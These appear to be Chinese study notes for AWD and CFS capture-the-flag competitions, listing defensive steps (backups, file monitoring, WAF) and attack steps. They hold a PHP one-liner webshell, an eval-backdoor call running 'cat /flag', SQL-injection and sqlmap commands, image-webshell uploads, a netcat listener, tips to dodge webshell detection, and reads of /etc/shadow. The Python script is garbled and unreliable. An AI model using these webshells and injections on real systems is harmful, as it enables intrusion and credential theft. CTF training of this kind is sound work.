AWD(高职组)比赛思路(来源于实验室杨旭学长的记录)
流量分析虚拟机,下载流量文件进行数据分析(可能无)*flag刷新flag被拿走,该队扣分,攻击者得分主办方对队伍的服务器进行check,扣分。得分由其他队伍均分数据库密码
数据库 (database-config.php)/etc/redis/redis.conftomacat-user.xmlwebpass. 用户,目录,端口,进程信息(提权) (ps,netstat -anptu,top,/etc/issue)网站后门,web日志(get,),flag日志,history,(备份网站)备份与恢复(删源码)
tar -czf 目录备份到本地 编写waf
做好数据清洗和日志信息文件与进程监控
文件监控(python脚本,filecmp,shutil,os)进程监控 修改服务口令,约束服务外联同步当前ssh用户主目录定期清理seesions文件,tmp目录服务弱口令主办方后门确定cms版本号,搜exploit进行利用一句话木马(限制ip,避免被D盾检测)Linux基础
grep -nir “eval” /var/www/htmlps -ef |grep httpdecho -e “\oldpasswd\nnewpasswd\nnewpasswd” | passwdps -u apache -o user,pidcontrab -r //删除自动化任务 常用脚本
php程序脚本waf加载/卸载程序(过滤)文件监控进程监控批量攻击脚本webshell管理系统 mac地址绑定漏洞(sql+文件上传+文件解析漏洞)维持权限(提权),加固。 nc -lvvp 9999 服务器提权 cp flag放在网站目录下(contrab 创建任务直接cp flag)
import requests
for i
in range():
ip
= ???
try:
req
= requests
.get
(url
)
print(ip
,req
.text
)
expect
:
psss
eval(_$GET
[PASS
])
requests
.get
(url
+?PASS
=system
("cat /flag"))
文件包含file_include(没有必要的话,直接过滤)check_login($user直接拼接到Sql查询语句,过滤不严格)越权上传文件(严格,验证后缀,上传文件功能删除)extract($_REQUEST);
a
(
a(
a(_post(‘b’)) 一句话木马(代码注入)逻辑漏洞:admin 111 验证码正确(验证码不刷新不改变)post注入 sqlmap -r sql.txt --dbs (爆库)
CFS综合靶场(本科组)比赛
网络拓扑
采用内网渗透的方式
攻击机IP:172.24.10.x(255.255.255.0) 与第一层靶机的网卡1处于同一网段
第一层靶机 网卡1:172.24.10.x(255.255.255.0)
网卡2:172.24.11.x(255.255.255.0)
第二层靶机 网卡1:172.24.11.x(255.255.255.0)
网卡2:172.24.12.x(255.255.255.0)
第三层靶机 网卡1:172.24.12.x(255.255.255.0)
攻入第一层靶机后,在第一层靶机上做代理依次访问第二台靶机
攻击思路
nmap扫描 nmap -a -sV ip扫描后台
御剑dirsearch(python dirsearch.py -u “URL” ) 登陆界面尝试sql注入 (万能密码admin’#)上传webshell
找上传目录(注意扫描出来的后台)传图片马 1.jpg.php等测试phpinfo();一句话木马
<?php phpinfo(); eval($_POST["PASS"]) ;?>
使用中国菜刀连接
寻找flag 常见flag位置
//etc/passwd/etc/shadowgrep “flag” -R /网站后台http ssh等配置文件crontab数据库网站的配置文件如:config.php桌面 流量包 开机启动项 SAM密码文件 日志文件(windows) 收集提权脚本和代理脚本